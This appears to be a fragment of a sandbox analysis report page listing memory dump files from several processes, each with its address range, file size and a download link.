memory/3256-6-0x0000000006210000-0x0000000006276000-memory.dmp

Filesize
408KB

Download
memory/3256-3-0x0000000005B40000-0x0000000006168000-memory.dmp

Filesize
6.2MB

Download
memory/3256-7-0x0000000006280000-0x00000000062E6000-memory.dmp

Filesize
408KB

Download
memory/3256-17-0x00000000062F0000-0x0000000006644000-memory.dmp

Filesize
3.3MB

Download
memory/3256-19-0x00000000068E0000-0x000000000692C000-memory.dmp

Filesize
304KB

Download
memory/3256-1-0x0000000002FA0000-0x0000000002FD6000-memory.dmp

Filesize
216KB

Download
memory/3256-18-0x00000000068A0000-0x00000000068BE000-memory.dmp

Filesize
120KB

Download
memory/3268-112-0x000000000A260000-0x000000000A37C000-memory.dmp

Filesize
1.1MB

Download
memory/3456-106-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/3888-119-0x000001FD53AD0000-0x000001FD53BDD000-memory.dmp

Filesize
1.1MB

Download